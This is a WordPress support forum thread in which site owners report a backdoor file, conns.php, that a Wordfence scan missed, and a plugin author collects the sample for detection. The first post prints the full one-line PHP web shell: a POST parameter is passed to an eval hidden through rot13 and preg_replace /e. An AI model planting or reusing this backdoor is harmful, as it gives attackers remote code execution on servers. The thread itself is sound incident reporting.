WF Scan may have missed a malware PHP script

  • Resolved frank tredici

    (@frank13)


    9 years, 4 months ago

    I manually run WF scans every morniing. My WP Multisite got hacked a few weeks ago (even with WF installed and running) and I continue to feel it is vulnerable and has holes in it that WF may be missing.

    Here’s what I found this morning during my morning scan.

    I looked at my server for files added or changed in the past 24 hours. I have been doing this every day each for since the hack attack.

    There was a foreign file present in the document root of my WP installation called conns.php. It resided at /home/myhost/public_html/conns.php.

    The file looks like this:

    <?php ($www= $_POST['yt']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>

    I then ran my morning WF scan and it was not picked up by WF.

    I deleted this file nonetheless.

    Does anyone know:

    • if my WPMS site is still infected?
    • why WF did not pick up this foreign file not part of WP core?
    • what I should do to further investigate this potential exposure and vulnerability in my WPMS install

    Thank you for helping.

    https://www.ads-software.com/plugins/wordfence/

Viewing 14 replies - 1 through 14 (of 14 total)
  • Thread Starter frank tredici

    (@frank13)

    Looks like str._rot13('riny') is in fact an infection.

    See:
    https://ejth.dk/2011/eval-is-evil-hiding-it-is-even-more-evil/98
    https://gist.github.com/jonaslejon/350379e43ddd5f563dba

    Thread Starter frank tredici

    (@frank13)

    Let me know your thoughts on this Tim. Thanks.

    Can you check the options to see if “Scan files outside your WordPress installation” is checked?

    Also, if you could screenshot the scan options and post a link to the picture here, it might help me make sure nothing is missing.

    tim

    Thread Starter frank tredici

    (@frank13)

    Here you go Tim — screen shot

    Thread Starter frank tredici

    (@frank13)

    removing email notification form this post and deleting plugin from my installation

    I had that conns.php file also and a bunch of HTML files were uploaded to the root of a WP site.

    Has anyone figured out how the conns.php got there yet?

    rchadgray, look in your plugins folder for any suspicious looking plugins that you didn’t install. I had this happen to one of my sites where a bad file kept appearing in the docroot of the site. I’d remove it and it’d appear immediately again. It turns out that one of the plugins was the culprit. It was creating the bad file.

    I just noticed the same thing on my site last night. The file I found that was off was named “wp-cupidony.php”

    Plugin Author WFMattR

    (@wfmattr)

    adambockler:

    If you still have a copy of the file and it was not found in a Wordfence scan, it may be a new type of malware — you can send a copy to samples [at] wordfence.com and we can add it to our scans.

    We also have a guide to cleaning a hacked site, with recommendations on using the deeper scan options, changing passwords, and more, which could help prevent the file from coming back:
    How do I clean my hacked site using Wordfence?

    -Matt R

    I got rid of it already :-/

    Plugin Author WFMattR

    (@wfmattr)

    That’s ok — the guide to cleaning a hacked site (linked above) may still be helpful, since it shows how to do more thorough scans, which may find additional files to clean too, and recommendations on changing passwords and such.

    If you have any trouble running the scans, let us know. If you can open a new post in the forum for any additional issues, that is best since this one was already resolved. Thanks!

    -Matt R

    I found this thread searching google. I got infected too. I have a copy of the file and will email it to you

    Nigel

    Plugin Author WFMattR

    (@wfmattr)

    Thank you!

    I just added it to our internal system for inclusion to the scan engine.

    tim
    fb1014

Viewing 14 replies - 1 through 14 (of 14 total)
  • The topic ‘WF Scan may have missed a malware PHP script’ is closed to new replies.